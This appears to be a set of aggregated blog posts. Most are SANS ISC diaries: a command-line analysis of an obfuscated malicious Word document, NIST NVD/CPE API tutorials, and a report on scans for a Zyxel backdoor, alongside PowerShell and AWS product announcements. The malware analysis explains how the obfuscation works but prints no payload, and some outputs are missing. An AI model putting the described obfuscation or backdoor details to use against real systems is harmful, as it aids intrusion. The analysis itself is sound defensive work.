Maldoc Strings Analysis, (Sat, Jan 9th)

This post was originally published on this site

As I announced in my diary entry "Strings 2021", I will write some diary entries following a simpler method of malware analysis, namely looking for strings inside malicious files using the strings command. Of course, this simple method will not work for most malware samples, but I still see enough samples for which this method will work.

Like this recent malicious Word document. When you analyze this sample with oledump.py, you will find an obfuscated PowerShell command inside the content of the Word document.

But we are not going to use oledump this time. We will look directly for strings inside the document, using my tool strings.py (similar to the strings command, but with some extra features).

When we run strings.py with option -a on the sample, a report with statistics will be produced:

We see that strings.py extracted 1549 strings, and that the longest string is characters bytes long.

That is unusual for a Word document, to contain such a long string. We run strings.py again, now with option -n 15000: this specifies that the minimum length of the strings extracted by strings.py should be 15000. Since there is only one string that is longer than 15000 in this sample, we will see the longest string (and only the longest string, no other strings):

This looks like a BASE64 string (ending with ==), except that there are a lot of repeating characters that are not BASE64 characters: ] and [.

What we have here, is obfuscation through repeated insertion of a unique string. I explain this in detail in my diary entry "Obfuscation and Repetition".

]b2[ is propably the string that is inserted over and over again to obfuscate the original string. To be sure, we can use my ad-hoc tool deobfuscate-repetitions.py:

So the repeating string actually seems to be ]b2[s (appearing 2028 times), and when you removing this repeating string, the string that remains starts with cmd cmd …

My tool deobfuscate-repetitions.py will continue running looking for other potential repeating strings, but it's clear that we found the correct one here, so we can just stop my tool with control-C.

And now that we used my tool to detect repeating strings, we will use it to deobfuscate the original string. This is done by using option -f (find) to find a deobfuscated string that contains a string we specify, cmd in this example:

And what we see here is a PowerShell command with a BASE-64 encoded script as argument.

If we still had any doubts if this was a malicious document, then this is a clear result that the sample is malicious.

And up til now, we didn't use any special tool to look inside the malicious Word document (.doc): just the strings command.

For this sample, we don't need to understand the structure of a Word document, or be familiar with a tool like oledump.py to peek inside a Word document. You just need some familiarity with the command-line, and be able to run the strings command with some options.

If your objective was to determine if this Word document is malicious or not, then you have succeeded. Just by using a strings command.

If your objective was to figure out what this Word document does, then we need to analyze the PowerShell command.

Tomorrow, I will publish a video where I do the full analysis with CyberChef. Here I will continue with command-line tools.

Next, we use my base64dump.py tool to find and decode the BASE64 script:

Like all BASE64-encoded PowerShell scripts passed as an argument, the script is in UNICODE. We use option -t utf16 to transform it to ASCII:

T

What we see here, is an obfuscated PowerShell script. When we take a close look, we can see fragments of urls. Strings containing URL fragments are concatenated in this PowerShell script. We will remove the concatenation operator (+) and other characters to reasemble the fragments, using command tr:

So we start to see some words, like family, but we still need to remove some characters, like the single quote:

And parentheses:

So now we have something that looks like a URL, except that the protocol is not what we expect (HTTP or HTTPS). We can use my tool re-search.py to extract the URLs:

If you want to understand why we have ss and s as protocol, and why @ terminates most URLs, we still need to do some analysis.

First, we use sed to put a newline character after each ; (semicolon), to have each PowerShell statement on a separate line, and make the script more readable:

And then we grep for family to select the line with URLs:

Notice here that the protocol of each URL contains string ]b2[s, and that there is a call to method replace to replace this string with string http.

Let's do this with sed ([ and ] have special meaning in regular expressions used by sed, so we need to escape these characters: [ and ]):

Finally, we have complete URLs. If we use re-search again, to extract the URLs, we get a single line:

This time, re-search is not extracting indivudual URLs. That's because of the @ character: this is a valid character in URLs, it is used to precede the protocol with credentials (username:password@hxxp://example[.]com). But this is not what is done in this PowerShell script. In this script, there are several URLs, and the separator is the @ character. So we replace the @ character with a newline:

And finally, re-search.py gives us a list of URLs:

For this sample, extracting the malicious PowerShell script is quite easy, just using the strings command and a string replacement. Decoding the script to extract IOCs takes more steps, all done with command line tools.

In next diary entry, I will publish a video showing the analysis of the same sample with CyberChef.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Using the NIST Database and API to Keep Up with Vulnerabilities and Patches – Playing with Code (Part 2 of 3), (Fri, Jan 8th)

This post was originally published on this site

Building on yesterday's story – now that we have an inventory built in CPE format, let's take an example CVE from that and write some code, what's in the NVD database (and API) that you can access, then use in your organization?

First, let's play with CVE-2020-24436, which is an Acrobat Reader vulnerability.  In PowerShell, let's construct our query, then from the results pull out all the bits that we're interested in.

$request = "https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2020-24436"
$cvemetadata = ( (invoke-webrequest $request) | convertfrom-json)

Let's start with the Published Date.  Note again that there's also a "last modified" date – the idea being that if a CVE gets updated that the modified date will reflect that.  Even looking at that briefly though that "last modified" date seems to be programatic, so I think it's getting changed when folks don't intend it – my first check was a Peoplesoft vuln from 2017, it had a 2020 last modified date for no reason I could see.  Anyway, here's the published date:

$PublishedDate = $cvemetadata.result.cve_items.publishedDate
$PublishedDate

2020-11-05T20:15Z

Next, the text description.  This is where the "traditional" CVE delivery paths fall down – they generally give you get the CVE number, then this text description, maybe a severity score.  This is fine for news stories or your report to management, but it's not something you can "monitor" when hundreds of them fly by every day.  Sorry about the rant, but I guess that's why we're playing with this code, so that you can build your own delivery mechanism for your organization.  Anyway, back to the text description:

$CVEDesc = $cvemetadata.result.cve_items.cve.description.description_data.value

$CVEDesc
Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit in that the victim must open a malicious document

The Reference URLs that may have more detail (usually there's a vendor URL in this list):

$CVEURLs=$cvemetadata.result.cve_items.cve.references.reference_data.url
$CVEURLs
https://helpx.adobe.com/security/products/acrobat/apsb20-67.html
https://www.zerodayinitiative.com/advisories/ZDI-20-1355/

The data on severity and scope (what we used to call the CVSS score):

$CVE_CVSSv3Data = $cvemetadata.result.CVE_items.impact.basemetricv3.cvssv3
$CVE_CVSSv3Data
version               : 3.1
vectorString          : CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector          : LOCAL
attackComplexity      : LOW
privilegesRequired    : NONE
userInteraction       : REQUIRED
scope                 : UNCHANGED
confidentialityImpact : HIGH
integrityImpact       : HIGH
availabilityImpact    : HIGH
baseScore             : 7.8
baseSeverity          : HIGH

 

We know what's installed on our affected host, but what versions of the application are affected by this CVE?  Note that list gives you vulnerable versions ($_.vulnerable = "True") and versions that are not affected ($_.vulnerabile = "False")

$CVEAffectedApps=$cvemetadata.result.CVE_items.configurations.nodes.children.cpe_match

$CVEAffectedApps

vulnerable cpe23Uri                                                   versionEndIncluding
———- ——–                                                   ——————-
      True cpe:2.3:a:adobe:acrobat:*:*:*:*:classic:*:*:*              20.001.30005       
      True cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:classic:*:*:*           17.011.30175       
      True cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:continuous:*:*:*        20.012.20048       
      True cpe:2.3:a:adobe:acrobat_reader:*:*:*:*:classic:*:*:*       20.001.30005       
      True cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:classic:*:*:*    17.011.30175       
      True cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:* 20.012.20048       
     False cpe:2.3:o:apple:mac_os:-:*:*:*:*:*:*:*                                        
     False cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* 

Winnowing this down to just the vulnerable versions:

($cvemetadata.result.CVE_items.configurations.nodes.children.cpe_match) | where {$_.vulnerable -eq "true" }

vulnerable cpe23Uri                                                   versionEndIncluding
———- ——–                                                   ——————-
      True cpe:2.3:a:adobe:acrobat:*:*:*:*:classic:*:*:*              20.001.30005       
      True cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:classic:*:*:*           17.011.30175       
      True cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:continuous:*:*:*        20.012.20048       
      True cpe:2.3:a:adobe:acrobat_reader:*:*:*:*:classic:*:*:*       20.001.30005       
      True cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:classic:*:*:*    17.011.30175       
      True cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:* 20.012.20048       

 

Now with some code written, on Monday we'll string everything together into a useful, complete reporting tool that you can use.

===============
Rob VandenBrink
rob@coherentconsulting.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SecretManagement and SecretStore Release Candidates

This post was originally published on this site

The SecretManagement and SecretStore release candidate (RC) modules are now available on the PowerShell Gallery.

The SecretManagement module helps users manage secrets by providing a common set of cmdlets to interface with secrets across vaults. This module supports an extensible model where local and remote vaults can be registered and unregistered for use in accessing and retrieving secrets. SecretStore is a cross-platform local extension vault for use with SecretManagement. We designed this vault as a best attempt at creating a vault that is available where PowerShell is, usable in popular PowerShell scenarios (like automation and remoting) and utilizes common security practices.

For more information on these modules check out these previous blog posts:

Before installing these modules, please uninstall the current preview versions of the modules and restart your PowerShell session.

To install these updates run the following commands:

Uninstall-Module Microsoft.PowerShell.SecretManagement -Force 
Uninstall-Module Microsoft.PowerShell.SecretStore -Force 
# Restart your PowerShell session 
Install-Module -Name Microsoft.PowerShell.SecretManagement -Repository PSGallery 
Install-Module -Name Microsoft.PowerShell.SecretStore -Repository PSGallery 
Register-SecretVault -Name SecretStore -ModuleName Microsoft.PowerShell.SecretStore -DefaultVault -AllowClobber

SecretManagement Updates

  • Register-SecretVault no longer emits error when strict language mode is set
  • Set-DefaultVault cmdlet has been renamed to Set-SecretVaultDefault

General Availability (GA)

This is a “go live” release, which means that we feel that this RC is feature complete and of GA quality. If no bugs are identified through this release, we will increment the versioning and declare the modules as GA in early February. If any high-risk bugs are identified we will continue to release RCs until the quality bar is met for a GA release.

The Extension Vault Ecosystem

To find other SecretManagement extension vault modules, search the PowerShell Gallery for the “SecretManagement” tag. Some community vault extensions that are available:

Thank you to everyone who has created vaults thus far!

Feedback and Support

Community feedback has been essential to the iterative development of these modules. Thank you to everyone who has contributed issues, and feedback thus far! To file issues or get support for the SecretManagement interface or vault development experience please use the SecretManagement repository. For issues which pertain specifically to the SecretStore and its cmdlet interface please use the SecretStore repository.

Sydney Smith

PowerShell Team

 

The post SecretManagement and SecretStore Release Candidates appeared first on PowerShell.

New – AWS Transfer Family support for Amazon Elastic File System

This post was originally published on this site

AWS Transfer Family provides fully managed Secure File Transfer Protocol (SFTP), File Transfer Protocol (FTP) over TLS, and FTP support for Amazon Simple Storage Service (S3), enabling you to seamlessly migrate your file transfer workflows to AWS.

Today I am happy to announce AWS Transfer Family now also supports file transfers to Amazon Elastic File System (EFS) file systems as well as Amazon S3. This feature enables you to easily and securely provide your business partners access to files stored in Amazon EFS file systems. With this launch, you now have the option to store the transferred files in a fully managed file system and reduce your operational burden, while preserving your existing workflows that use SFTP, FTPS, or FTP protocols.

Amazon EFS file systems are accessible within your Amazon Virtual Private Cloud (VPC) and VPC connected environments. With this launch, you can securely enable third parties such as your vendors, partners, or customers to access your files over the supported protocols at scale globally, without needing to manage any infrastructure. When you select Amazon EFS as the data store for your AWS Transfer Family server, the transferred files are readily available to your business-critical applications running on Amazon Elastic Compute Cloud (EC2), as well as to containerized and serverless applications run using AWS services such as Amazon Elastic Container Service (ECS), Amazon Elastic Kubernetes Service (EKS), AWS Fargate, and AWS Lambda.

Using Amazon EFS – Getting Started
To get started in your existing Amazon EFS file system, make sure the POSIX identities you assign for your SFTP/FTPS/FTP users are owners of the files and directories you want to provide access to. You will provide access to that Amazon EFS file system through a resource-based policy. Your role also needs to establish a trust relationship. This trust relationship allows AWS Transfer Family to assume the AWS Identity and Access Management (IAM) role to access your bucket so that it can service your users’ file transfer requests.

You will also need to make sure you have created a mount target for your file system. In the example below, the home directory is owned by userid 1234 and groupid 5678.

$ mkdir home/myname
$ chown 1234:5678 home/myname

When you create a server in the AWS Transfer Family console, select Amazon EFS as your storage service in the Step 4 section Choose a domain.

When the server is enabled and in an online state, you can add users to your server. On the Servers page, select the check box of the server that you want to add a user to and choose Add user.

In the User configuration section, you can specify the username, uid (e.g. 1234), gid (e.g 5678), IAM role, and Amazon EFS file system as user’s home directory. You can optionally specify a directory within the file system which will be the user’s landing directory. You use a service-managed identity type – SSH keys. If you want to use password type, you can use a custom option with AWS Secrets Manager.

Amazon EFS uses POSIX IDs which consist of an operating system user id, group id, and secondary group id to control access to a file system. When setting up your user, you can specify the username, user’s POSIX configuration, and an IAM role to access the EFS file system. To learn more about configuring ownership of sub-directories in EFS, visit the documentation.

Once the users have been configured, you can transfer files using the AWS Transfer Family service by specifying the transfer operation in a client. When your user authenticates successfully using their file transfer client, it will be placed directly within the specified home directory, or root of the specified EFS file system.

$ sftp myname@my-efs-server.example.com

sftp> cd /fs-23456789/home/myname
sftp> ls -l
-rw-r--r-- 1 3486 1234 5678 Jan 04 14:59 my-file.txt
sftp> put my-newfile.txt
sftp> ls -l
-rw-r--r-- 1 3486 1234 5678 Jan 04 14:59 my-file.txt
-rw-r--r-- 1 1002 1234 5678 Jan 04 15:22 my-newfile.txt

Most of SFTP/FTPS/FTP commands are supported in the new EFS file system. You can refer to a list of available commands for FTP and FTPS clients in the documentation.

Command Amazon S3 Amazon EFS
cd Supported Supported
ls/dir Supported Supported
pwd Supported Supported
put Supported Supported
get Supported Supported including resolving symlinks
rename Supported (only file) Supported (file or folder)
chown Not supported Supported (root only)
chmod Not supported Supported (root only)
chgrp Not supported Supported (root or owner only)
ln -s Not supported Not supported
mkdir Supported Supported
rm Supported Supported
rmdir Supported (non-empty folders only) Supported
chmtime Not Supported Supported

You can use Amazon CloudWatch to track your users’ activity for file creation, update, delete, read operations, and metrics for data uploaded and downloaded using your server. To learn more on how to enable CloudWatch logging, visit the documentation.

Available Now
AWS Transfer Family support for Amazon EFS file systems is available in all AWS Regions where AWS Transfer Family is available. There are no additional AWS Transfer Family charges for using Amazon EFS as the storage backend. With Amazon EFS storage, you pay only for what you use. There is no need to provision storage in advance and there are no minimum commitments or up-front fees.

To learn more, take a look at the FAQs and the documentation. Please send feedback to the AWS forum for AWS Transfer Family or through your usual AWS support contacts.

Learn all the details about AWS Transfer Family to access Amazon EFS file systems and get started today.

Channy;

Using the NIST Database and API to Keep Up with Vulnerabilities and Patches (Part 1 of 3), (Thu, Jan 7th)

This post was originally published on this site

It's been a while since NIST changed the API for their NVD (National Vulnerability Database), so I (finally) got around to writing some code against that API.  This API gives you a way for your code to query CVE's (Common Vulnerabilities and Exposures) against a broad range of products (or against specific products).  What this immediately brought to my mind was what I always ask my clients to put in someone's job description "monitor vendor announcements and industry news for vulnerabilities in the products in use by the organization".  This can be a tough row to hoe, especially if we're not talking the Microsoft / Cisco / Oracle and other "enterprise flagship" products – the ones that might immediately come to mind – if you monitor the cve list you'll see dozens or hundreds of CVEs scroll by in a day.   Also, subscribing to all the vendor security newsgroups and feeds can also quickly turn into a full-time proposition.  I think using the NIST API can be a viable alternative to just plain "keeping up".  CVE's often are a few days behind vendor announcements and patches, but on the other hand the CVE database is a one-stop-shop, (theoretically) everything is posted here.

In most cases I'd expect a hybrid approach – monitor industry news and vendor sources for your "big gun" applications, and then query this database for everything (to catch smaller apps and anything missed on your list of major apps).

First of all, in this API products are indexed by "CPE" (Common Platform Enumeration), a structured naming convention.  Let's see how this works – first, let's query the CPE database to get the NVD representation of the products that you have in your organization.  You can do this iteratively.

For instance, to get PeopleSoft versions, starty by querying Oracle products:

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle

Then narrow it down with the info you find in that search to get PeopleSoft.  

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle:peoplesoft_enterprise

As you can see, you can narrow this down further by version:

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:a:oracle:peoplesoft_enterprise:8.22.14

.. however you might also want to leave that a bit open – you don't want to be in the position where your Operations team has updated the application but maybe didn't tell the security team or the security developer team (that'd be you).
(Or the dev-sec-dev-devops or whatever we're calling that these days :-))

Repeat this process for everything in your organization's flock of applications and Operating Systems.  As with all things of this type, of course test with one or three applications/CPEs, then grow your list over time.  You can use our previous diary on collecting hardware and software inventories (CIS Critical Controls 1 and 2) – code for these is here:
https://github.com/robvandenbrink/Critical-Controls/tree/master/CC01
https://github.com/robvandenbrink/Critical-Controls/tree/master/CC02

Full docs for the CPE API are here:
https://csrc.nist.gov/publications/detail/nistir/7696/final
https://csrc.nist.gov/CSRC/media/Projects/National-Vulnerability-Database/documents/web%20service%20documentation/Automation%20Support%20for%20CPE%20Retrieval.pdf

So how do we translate from a "real" inventory as reported by Windows WMI or PowerShell to what the CPE API expects?  The short answer is "the hard way" – we hit each application, one by one, and do a "it looks sorta like this" query.  The NVD gives us a handy page to do this in – for a manual thing like this I find the website to be quicker than the API.
First, navigate to https://nvd.nist.gov/products/cpe/search/

Then, put in your application name, vendor name, or any substring of those.

For instance, putting in "AutoCad" gives you 4 pages of various versions and application "bolt-ons" (or "toolsets" in autocad-speak).  It's interesting that the versioning convention is not standard, not even in this single first product example.
Some versions are named as "autocad:2010", and some are named as "autodesk:autocad_architecture_2009"
What you'll also find in this exploration is that "AutoCad version 2020" is actually version "24.0" as reported by the Windows interfaces – some of this oddness creeps into the CPE database as well.

Looking at a few apps that are more commonly used, let's look at the Adobe and FoxIT PDF readers.

To get all current-ish versions of FoxIT reader, we'll look for 10.0 and 10.0.1, these boil down to:

cpe:2.3:a:foxitsoftware:foxit_reader:10.*

This query gives us a short list:

cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0:*:*:*:*:*:*:*
cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0.35798:*:*:*:*:*:*:*
cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.35811:*:*:*:*:*:*:*

For our final list, we'll modify that last one to catch future sub-versions of 10.0.1, as:

cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.*

Looking for Adobe Reader DC version 19 and 20, we end up with:

cpe:2.3:a:adobe:acrobat_reader_dc:19.*
cpe:2.3:a:adobe:acrobat_reader_dc:20.*

This all looks straightforward, except that when you look at a few versions of 20, it looks like:

cpe:2.3:a:adobe:acrobat_reader_dc:20.009.20074:*:*:*:continuous:*:*:*
cpe:2.3:a:adobe:acrobat_reader_dc:20.001.30002:*:*:*:classic:*:*:*

So you'd think a properly formed query for version 20/classic would look like:
cpe:2.3:a:adobe:acrobat_reader_dc:20.*.*:*:*:*:classic:*:*:* – but no, that doesn't work

So you see, there's a bit of back-and-forth for each one – for each of my clients I tend to put an afternoon aside to turn their software inventory into a "CPE / CVE friendly" inventory.
You can speed this process up by downloading the entire CPE dictionary and "grep" through it for what you need: https://nvd.nist.gov/products/cpe
Just using grep, you now likely relate your software inventory back to the CPE dictionary much easier – for instance:

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i office
    <title xml:lang="en-US">Avery Wizard For Microsoft Office Word 2003 2.1</title>
    <title xml:lang="en-US">Microsoft BackOffice</title>
    <title xml:lang="en-US">Microsoft BackOffice 4.0</title>
    <title xml:lang="en-US">Microsoft BackOffice 4.5</title>
    <title xml:lang="en-US">Microsoft backoffice_resource_kit</title>
    <title xml:lang="en-US">Microsoft backoffice_resource_kit 2.0</title>
    <title xml:lang="en-US">Microsoft Office Excel 2002 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2003 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2007 Service Pack 2</title>
    <title xml:lang="en-US">Microsoft Office Excel 2007 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x86 (32-bit)</title>
    <title xml:lang="en-US">Microsoft Internet Explorer 5 (Office 2000)</title>
    <title xml:lang="en-US">Microsoft Internet Explorer 5.01 (Office 2000 SR-1)</title>
    <title xml:lang="en-US">Microsoft Office</title>
    <title xml:lang="en-US">Microsoft Office 3.0</title>
    <title xml:lang="en-US">Microsoft Office 4.0</title>
    <title xml:lang="en-US">Microsoft Office 4.3</title>
    <title xml:lang="en-US">Microsoft Office 95</title>
    <title xml:lang="en-US">Microsoft Office 97</title>
    < … more older versions .. >
    <title xml:lang="en-US">Microsoft Office 2013</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT</title>
    <title xml:lang="en-US">Microsoft Office 2013 Click-to-Run (C2R)</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT Edition</title>
    <title xml:lang="en-US">Microsoft Office 2013 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 x86 (32-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 SP1</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 on X86</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT SP1</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 RT Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 for MacOS</title>
    <title xml:lang="en-US">Microsoft Office 2016 Click-to-Run (C2R)</title>
    <title xml:lang="en-US">Microsoft Office 2016 Click-to-Run (C2R) x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2016 MacOS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 Mac OS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2019</title>
    <title xml:lang="en-US">Microsoft Office 2019 on x64</title>
    <title xml:lang="en-US">Microsoft Office 2019 on x86</title>
    <title xml:lang="en-US">Microsoft Office 2019 for Mac OS</title>
    <title xml:lang="en-US">Microsoft Office 2019 for Mac OS X</title>
    <title xml:lang="en-US">Microsoft Office 2019 for macOS</title>
    <title xml:lang="en-US">Microsoft Office 2019 Mac OS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT</title>
    < and so on … >

You can see this list relates much better to your "actual" inventory as reported by more "traditional" means (WMI / Powershell).  
Now refine this list, relating the results back to your real inventory.  Sorry, since the "match" on the title isn't always exact, this again usually involves some manual components.  Even mainstream products don't always have a match.

For instance, looking for MS Project 2013:
From our cross-domain software inventory (in PowerShell) we have:

> $domainapps.name | grep "Project"
Microsoft Project MUI (English) 2013
Microsoft Project Professional 2013

And from the CPE Dictionary:

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i project | grep 2013
    <title xml:lang="en-US">Microsoft Project 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Project Server 2013</title>
    <title xml:lang="en-US">Microsoft Project Server 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Project Server 2013 Service Pack 1 (x64) 64-bit</title>

So a match, but not exact.

Another illustration – even MS Word there isn't an exact match, in almost every case we're either picking a few CPE's or guesstimating for the closest one:

> $domainapps.name | grep "Word"
Microsoft Word MUI (English) 2013

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i word | grep 2013
    <title xml:lang="en-US">Microsoft Word 16.0.11425.20132 for Android</title>
    <title xml:lang="en-US">Microsoft Word 2013</title>
    <title xml:lang="en-US">Microsoft Word 2013 RT Edition</title>
    <title xml:lang="en-US">Microsoft Word 2013 for Microsoft Windows RT</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1 on x86</title>
    <title xml:lang="en-US">Microsoft Word 2013 SP1 RT</title>
    <title xml:lang="en-US">Microsoft Word RT 2013 Service Pack 1</title>

 

Where this plays well for me is if I exclude Windows and Office – just using Windows Update (or  your WSUS, SCCM or whatever patch manager you use), then auditing the "last updated" date for Windows tends to catch those really well.  It's the MS server apps – Exchange, SQL and so on, and everything that isn't Microsoft where this method really helps turn the flood of CVE information into a once a week summary that you can use.

 

As you'd expect, if you are in a niche industry, you may not find all of your applications – for instance ICS clients and Banking clients may not find their user-facing main business applications in the CPE list, and sadly will never see CVEs to keep their vendors honest.

In a welcome recent development, as I was writing this article I noticed that if your application has a listening port, nmap will make a reasonably good estimate of what that application is with the "sV" option (Probe open ports to determine service/version info).   In the example below nmap very nicely inventories my ESXI 7.0 server, and gives me the exact CPE for it:

C:>nmap -sV -p 443 –open 192.168.122.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-06 18:45 Eastern Standard Time
Nmap scan report for 192.168.122.51
Host is up (0.0011s latency).

PORT    STATE SERVICE   VERSION
443/tcp open  ssl/https VMware ESXi SOAP API 7.0.0
MAC Address: 00:25:90:CB:00:18 (Super Micro Computer)
Service Info: CPE: cpe:/o:vmware:ESXi:7.0.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.70 seconds

Now, with your software inventory complete and your CPE strings in hand, you can start querying for CVE's!

Sticking with our Acrobat and FoxIT examples, we can search for all CVE's –  to do this we'll change the API URI called slightly, all the URI conventions stay consistent:

https://services.nvd.nist.gov/rest/json/cves/1.0?cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*

Now things start to look interesting! Of course, given our search this gets us a boatload of CVE's.  Let's look for the last 60-0ish days – we'll querying "modified since a Nov 1, 2020":

https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*

Keep in mind to that there are a few dates involved- the publishedDate and lastModifiedDate.  While the NVD examples typically go after "last modified", I've seen CVE's from the mid 2000's with a "last modified" date in 2019 – so be careful.  Normally I'm querying using "publishedDate".

Again, rinse and repeat for all of your CPE's collected.  We're still playing in the browser, but you can see it's a simple query, and the return values are in JSON, so things look simple.  Except that as things nest and nest, what looks simple on the screen isn't necessarily simple in code.  For instance, to get the CVE numbers for the Acrobat Reader DC 20 query above, the PowerShell code looks like:

$request = "https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*"
$CVES = (invoke-webrequest $request | ConvertFrom-Json).result.CVE_items.cve.CVE_data_meta.id
$CVES

CVE-2020-24439
CVE-2020-24438
CVE-2020-24436
CVE-2020-24434
CVE-2020-24426
CVE-2020-24437
CVE-2020-24435
CVE-2020-24433
CVE-2020-24432
CVE-2020-24431
CVE-2020-24430
CVE-2020-24429
CVE-2020-24428
CVE-2020-24427

While this is starting to get useful, keep in mind that it's only as good as the database.  For instance, looking at any particular product, writing it will involve the use of a language and likely some libraries, maybe a framework and some other components.  There isn't a team of elves drawing up that heirarchy for public comsumption anywhere.  We can only hope that the dev team who wrote the thing is keeping that list for their own use! (hint – lots of them are not).

You can deconstruct any particular application to some degree ( https://isc.sans.edu/forums/diary/Libraries+and+Dependencies+It+Really+is+Turtles+All+The+Way+Down/20533/ ), but if you go that deep, you'll find that your list will likely see components get added or removed from version to version – it'll turn into a whack-a-mole-science-project in no time!
For a point-in-time application pentest this can be useful, but to just keep tabs on how your security posture is from week to week, you'll likely find yourself spending more time on application archeology than it's worth.

All is not lost though – as we've seen above we can get useful information just at the application level – and keep in mind the CVE list is what your scanner uses as it's primary source, also your red team, your malware, and any "hands on keyboard" attackers that your malware escorts onto your network.  So while the CVE list will never be complete, it's the data all of your malicious actors go to first.

Let's dig deeper into this – with our inventory of CPE's now solid, tomorrow we'll play more with the API details the CVE level, and Monday there'll be a full working app (I promise!) that you can use in your organization.

==== of note ====

In the course of me playing with this API, I ended up opening a case with the folks at the NIST, they were very responsive (2 day turnaround from initial question to final answer), which for me is very responsive, especially for a free product!

===============
References:

Full docs for CVE API are here:
https://csrc.nist.gov/publications/detail/nistir/7696/final
https://csrc.nist.gov/CSRC/media/Projects/National-Vulnerability-Database/documents/web%20service%20documentation/Automation%20Support%20for%20CPE%20Retrieval.pdf

===============
Rob VandenBrink
rob@coherentsecurity.com

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scans for Zyxel Backdoors are Commencing., (Wed, Jan 6th)

This post was originally published on this site

It was the day (or two days actually) before Christmas when Niels Teusing published a blog post about a back door in various Zyxel products [1]. Niels originally found the vulnerability in Zyxel's USG40 security gateway, but it of course affects all Zyxel devices using the same firmware. According to Zyxel, the password was used "to deliver automatic firmware updates to connected access points through FTP" [2]. So in addition to using a fixed password, it appears the password was also sent in the clear over FTP.

Zyxel products are typically used by small businesses as firewalls and VPN gateways. ("Unified Security Gateway"). There is little in terms of defense in depth that could be applied to protect the device, and in ssh and the VPN endpoint via HTTPS are often exposed. The default credentials found by Niels are not just limited to ftp. They can be used to access the device as an administrator via ssh.

So yet again, we do have a severe "stupid" vulnerability in a device that is supposed to secure what is left of our perimeter.

Likely due to the holidays, and maybe because Niels did not initially publish the actual password, widespread exploitation via ssh has not started until now. But we are no seeing attempts to access our ssh honeypots via these default credentials. 

The scans started on Monday afternoon (I guess they first had to adapt their scripts in the morning) initially mostly from %%ip:185.153.196.230%%. On Tuesday, %%ip:5.8.16.167%% joined in on the fun and finally today, we have %%ip:45.155.205.86%%. The last IP has been involved in scanning before. 

What can/should you do?

